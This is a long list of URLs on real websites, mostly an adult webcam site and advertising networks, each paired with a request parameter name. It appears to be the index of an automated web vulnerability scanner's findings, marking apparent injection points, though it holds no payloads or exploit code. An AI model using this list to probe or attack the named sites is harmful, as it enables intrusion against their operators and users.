http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]
http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]
http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]
http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]
http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]
http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://fr.imlive.com/waccess/ [gotopage parameter]
http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://gr.imlive.com/waccess/ [cbname parameter]
http://gr.imlive.com/waccess/ [from parameter]
http://gr.imlive.com/waccess/ [gotopage parameter]
http://gr.imlive.com/waccess/ [promocode parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [CN parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [ticker parameter]
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html [CN parameter]
http://hpi.rotator.hadj7.adjuggler.net/favicon.ico [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 2]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 1]
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj [REST URL parameter 2]
http://ib.adnxs.com/ab [cnd parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [mpvc parameter]
http://img.mediaplex.com/content/0/14302/119028/social_ponder_728x90.js [placementid parameter]
http://imlive.com/ [name of an arbitrarily supplied request parameter]
http://imlive.com/ [name of an arbitrarily supplied request parameter]
http://imlive.com/SiteInformation.html [REST URL parameter 1]
http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]
http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]
http://imlive.com/become_celeb.asp [REST URL parameter 1]
http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]
http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]
http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]
http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]
http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]
http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]
http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]
http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]
http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]
http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/warningjx.aspx [redirect parameter]
http://imlive.com/warningms.asp [ms parameter]
http://imlive.com/warningms.asp [ms parameter]
http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]
http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]
http://imlive.com/wmaster.ashx [gotopage parameter]
http://in.imlive.com/ [name of an arbitrarily supplied request parameter]
http://in.imlive.com/ [name of an arbitrarily supplied request parameter]
http://in.imlive.com/waccess/ [gotopage parameter]
http://it.imlive.com/ [name of an arbitrarily supplied request parameter]
http://it.imlive.com/ [name of an arbitrarily supplied request parameter]
http://it.imlive.com/waccess/ [gotopage parameter]
http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]
http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [bgColorActive parameter]
http://jqueryui.com/themeroller/ [bgColorContent parameter]
http://jqueryui.com/themeroller/ [bgColorDefault parameter]
http://jqueryui.com/themeroller/ [bgColorError parameter]
http://jqueryui.com/themeroller/ [bgColorHeader parameter]
http://jqueryui.com/themeroller/ [bgColorHighlight parameter]
http://jqueryui.com/themeroller/ [bgColorHover parameter]
http://jqueryui.com/themeroller/ [bgColorOverlay parameter]
http://jqueryui.com/themeroller/ [bgColorShadow parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]
http://jqueryui.com/themeroller/ [bgTextureActive parameter]
http://jqueryui.com/themeroller/ [bgTextureContent parameter]
http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
http://jqueryui.com/themeroller/ [bgTextureError parameter]
http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]
http://jqueryui.com/themeroller/ [bgTextureHover parameter]
http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]
http://jqueryui.com/themeroller/ [bgTextureShadow parameter]
http://jqueryui.com/themeroller/ [borderColorActive parameter]
http://jqueryui.com/themeroller/ [borderColorContent parameter]
http://jqueryui.com/themeroller/ [borderColorDefault parameter]
http://jqueryui.com/themeroller/ [borderColorError parameter]
http://jqueryui.com/themeroller/ [borderColorHeader parameter]
http://jqueryui.com/themeroller/ [borderColorHighlight parameter]
http://jqueryui.com/themeroller/ [borderColorHover parameter]
http://jqueryui.com/themeroller/ [cornerRadius parameter]
http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]
http://jqueryui.com/themeroller/ [fcActive parameter]
http://jqueryui.com/themeroller/ [fcContent parameter]
http://jqueryui.com/themeroller/ [fcDefault parameter]
http://jqueryui.com/themeroller/ [fcError parameter]
http://jqueryui.com/themeroller/ [fcHeader parameter]
http://jqueryui.com/themeroller/ [fcHighlight parameter]
http://jqueryui.com/themeroller/ [fcHover parameter]
http://jqueryui.com/themeroller/ [ffDefault parameter]
http://jqueryui.com/themeroller/ [fsDefault parameter]
http://jqueryui.com/themeroller/ [fwDefault parameter]
http://jqueryui.com/themeroller/ [iconColorActive parameter]
http://jqueryui.com/themeroller/ [iconColorContent parameter]
http://jqueryui.com/themeroller/ [iconColorDefault parameter]
http://jqueryui.com/themeroller/ [iconColorError parameter]
http://jqueryui.com/themeroller/ [iconColorHeader parameter]
http://jqueryui.com/themeroller/ [iconColorHighlight parameter]
http://jqueryui.com/themeroller/ [iconColorHover parameter]
http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]
http://jqueryui.com/themeroller/ [offsetTopShadow parameter]
http://jqueryui.com/themeroller/ [opacityOverlay parameter]
http://jqueryui.com/themeroller/ [opacityShadow parameter]
http://jqueryui.com/themeroller/ [thicknessShadow parameter]
http://k.collective-media.net/cmadj/cm.quadbostonherald/ [REST URL parameter 2]
http://k.collective-media.net/cmadj/cm.quadbostonherald/ [sz parameter]
http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
http://local.nissanusa.com/zip.aspx [vehicle parameter]
http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx [vary parameter]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]
http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]
http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [_RM_HTML_MM_ parameter]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 4]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 5]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 6]
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [_RM_HTML_MM_ parameter]
http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]
http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]
http://nl.imlive.com/waccess/ [gotopage parameter]
http://no.imlive.com/ [name of an arbitrarily supplied request parameter]
http://no.imlive.com/ [name of an arbitrarily supplied request parameter]
http://no.imlive.com/waccess/ [gotopage parameter]
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 4]
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 5]
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 6]
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 8]
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]
http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 4]
http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 5]
http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 6]
http://onset.freedom.com/fi/analytics/cms/ [ctype parameter]
http://onset.freedom.com/fi/analytics/cms/ [domain parameter]
http://onset.freedom.com/fi/analytics/cms/ [domain parameter]
http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]
http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]
http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]
http://raw.oggifinogi.com/GetScript.aspx [name of an arbitrarily supplied request parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiImpolite parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiSite parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]
http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]
http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]
http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]
http://ru.imlive.com/waccess/ [gotopage parameter]
http://se.imlive.com/ [name of an arbitrarily supplied request parameter]
http://se.imlive.com/ [name of an arbitrarily supplied request parameter]
http://se.imlive.com/waccess/ [gotopage parameter]
http://smm.sitescout.com/tag.jsp [h parameter]
http://smm.sitescout.com/tag.jsp [pid parameter]
http://smm.sitescout.com/tag.jsp [w parameter]
http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 2]
http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 3]
http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 2]
http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 3]
http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 2]
http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 3]
http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 2]
http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 3]
http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 2]
http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 3]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://voken.eyereturn.com/ [233369&click parameter]
http://voken.eyereturn.com/pb/get [233369&click parameter]
http://widgets.mobilelocalnews.com/ [uid parameter]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [v parameter]
http://www.berkshireeagle.com/ [name of an arbitrarily supplied request parameter]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]
